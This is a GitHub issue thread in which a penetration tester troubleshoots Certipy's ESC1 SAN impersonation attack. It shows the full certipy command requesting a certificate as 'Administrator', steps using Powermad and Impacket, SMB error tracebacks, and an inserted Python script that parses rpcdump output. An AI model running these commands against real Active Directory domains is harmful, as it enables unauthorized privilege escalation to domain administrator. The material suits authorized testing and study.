
Another command syntax question re "ESC1 - SAN impersonation" attack #20

7MinSec opened this issue Feb 10, 2022 · 4 comments

7MinSec commented Feb 10, 2022

Hi again,

I raised this issue and it was determined the certificate service was not running on my CA.

On a second CA in the same environment, Certipy identified it as being vulnerable to the ESC1 - SAN impersonation attack. Specifically, Domain Computers can enroll. I used Powermad to create a "ghost" computer object. Then I used GetTGT from Impacket and issued `export KRB5CCNAME=ghost-machine.cache`. I also verified with rpcdump that certsrv.exe is running.

Now what I'm trying to run with Certipy is as follows:

```
certipy 'domain.com/GHOST-MACHINE@ip.address.of.CA' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'
```

When I do, I basically get the same output as issue 19, with a long traceback that ends in:

```
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
```

Again, the difference this time around is that I believe the certificate services are running, so I'm not sure why my attempts are not successful. Could you please help?

Thanks,
Brian


ly4k commented Feb 14, 2022

Hello Brian,

To use Kerberos authentication, you have to specify the FQDN of the CA in the target, and not the IP. You can specify the IP in the -target-ip parameter if DNS is an issue. Also, you don't have to use Kerberos, you can just specify the hash or password. Can you please provide the debug output for more troubleshooting?

Best regards
Oliver


7MinSec commented Feb 14, 2022

Thanks! OK so I changed the request to have the FQDN of the CA as the target. Specifically:

```
certipy 'FQDN.OF.THE.CA' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'
```

My debug says:

```
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 556, in openFile
    return self._SMBConnection.create(treeId, pathName, desiredAccess, shareMode, creationOption,
  File "/usr/local/lib/python3.9/dist-packages/impacket/smb3.py", line 1227, in create
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/usr/local/lib/python3.9/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/bin/certipy", line 33, in <module>
    sys.exit(load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')())
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/entry.py", line 172, in main
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 319, in request
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 232, in run
  File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/request.py", line 225, in connect
  File "/usr/local/lib/python3.9/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 803, in connect
    return self._transport.connect()
  File "/usr/local/lib/python3.9/dist-packages/impacket/dcerpc/v5/transport.py", line 518, in connect
    self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 560, in openFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
```

Thanks,
Brian


ly4k commented Feb 15, 2022

Hello Brian,

It seems really weird. Almost as if the named pipe is missing. Can you provide me with the certsrv.exe entry from rpcdump?


ly4k commented Feb 19, 2022

A new version of Certipy has been released. Please try with the new -dynamic-endpoint parameter.
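The thread above turns on one diagnostic question: whether the CA's ICertPassage (MS-ICPR) interface is advertised on the fixed `\pipe\cert` named pipe, or only on dynamic TCP ports (which is what the later `-dynamic-endpoint` option addresses). The following is an added example, not part of Certipy, impacket, or this issue, for an administrator checking their own CA's RPC exposure from a saved rpcdump listing. It parses the listing by record, locates the ICertPassage interface by its well-known UUID, and reports which transports are advertised. Both listings embedded in the block are constructed sample text in rpcdump's output shape, not captured from any real host; the hostnames and ports in them are made up.

```python
"""Report how a CA's ICertPassage (MS-ICPR) RPC interface is exposed, from an
rpcdump-style endpoint listing.

Added example (not Certipy or impacket code). The two listings below are
CONSTRUCTED samples in rpcdump's output shape; the host and port values are
invented for the demonstration.
"""
import re
from dataclasses import dataclass, field

# Interface UUID of ICertPassage (MS-ICPR), registered by certsrv.exe on a CA.
ICPR_UUID = "91ae6020-9e3c-11cf-8d7c-00aa00c091be"

# Constructed sample: the CA advertises both a dynamic TCP port and the
# fixed \pipe\cert named pipe.
SAMPLE_WITH_PIPE = r"""
Protocol: [MS-ICPR]: ICertPassage Remote Protocol
Provider: certsrv.exe
UUID    : 91AE6020-9E3C-11CF-8D7C-00AA00C091BE v0.0
Bindings:
          ncacn_ip_tcp:ca01.lab.example[49666]
          ncacn_np:\\CA01[\pipe\cert]

Protocol: N/A
Provider: N/A
UUID    : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0
Bindings:
          ncacn_ip_tcp:ca01.lab.example[49667]
"""

# Constructed sample: the same interface with only a dynamic TCP endpoint.
# A client that opens \pipe\cert over SMB against such a CA gets
# STATUS_OBJECT_NAME_NOT_FOUND, as seen in the traceback in this thread.
SAMPLE_TCP_ONLY = r"""
Protocol: [MS-ICPR]: ICertPassage Remote Protocol
Provider: certsrv.exe
UUID    : 91AE6020-9E3C-11CF-8D7C-00AA00C091BE v0.0
Bindings:
          ncacn_ip_tcp:ca01.lab.example[49666]
"""

RPC_TRANSPORTS = ("ncacn_ip_tcp", "ncacn_np", "ncacn_http", "ncalrpc")


@dataclass
class Endpoint:
    protocol: str
    provider: str = ""
    uuid: str = ""
    bindings: list = field(default_factory=list)


def parse_rpcdump(text):
    """Split an rpcdump listing into Endpoint records (one per 'Protocol:' block)."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Protocol:"):
            current = Endpoint(protocol=line.split(":", 1)[1].strip())
            records.append(current)
        elif current is None:
            continue  # text before the first record; ignore
        elif line.startswith("Provider:"):
            current.provider = line.split(":", 1)[1].strip()
        elif line.startswith("UUID"):
            # "UUID    : <uuid> v<major>.<minor>" -> keep just the uuid, lower-cased
            current.uuid = line.split(":", 1)[1].strip().split()[0].lower()
        elif line.split(":", 1)[0] in RPC_TRANSPORTS:
            current.bindings.append(line)
    return records


def certsrv_exposure(text):
    """Describe how ICertPassage is reachable according to the listing.

    named_pipe: a ncacn_np binding (the fixed \pipe\cert endpoint) is advertised.
    tcp_ports:  dynamic ncacn_ip_tcp ports, which a client must locate via the
                endpoint mapper instead of assuming the named pipe.
    """
    for ep in parse_rpcdump(text):
        if ep.uuid != ICPR_UUID:
            continue
        pipes = [b for b in ep.bindings if b.startswith("ncacn_np:")]
        ports = []
        for b in ep.bindings:
            m = re.match(r"ncacn_ip_tcp:.*\[(\d+)\]$", b)
            if m:
                ports.append(int(m.group(1)))
        return {"registered": True, "provider": ep.provider,
                "named_pipe": bool(pipes), "tcp_ports": ports}
    return {"registered": False, "provider": None,
            "named_pipe": False, "tcp_ports": []}


if __name__ == "__main__":
    for name, sample in (("with pipe", SAMPLE_WITH_PIPE), ("tcp only", SAMPLE_TCP_ONLY)):
        print(name, certsrv_exposure(sample))
```

When `named_pipe` is False but `tcp_ports` is non-empty, the interface is up but only reachable through a dynamic endpoint, which is the situation where a client hard-wired to `\pipe\cert` fails with the SMB "object name not found" error shown earlier in this thread.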

@ly4k ly4k closed this as completed Feb 19, 2022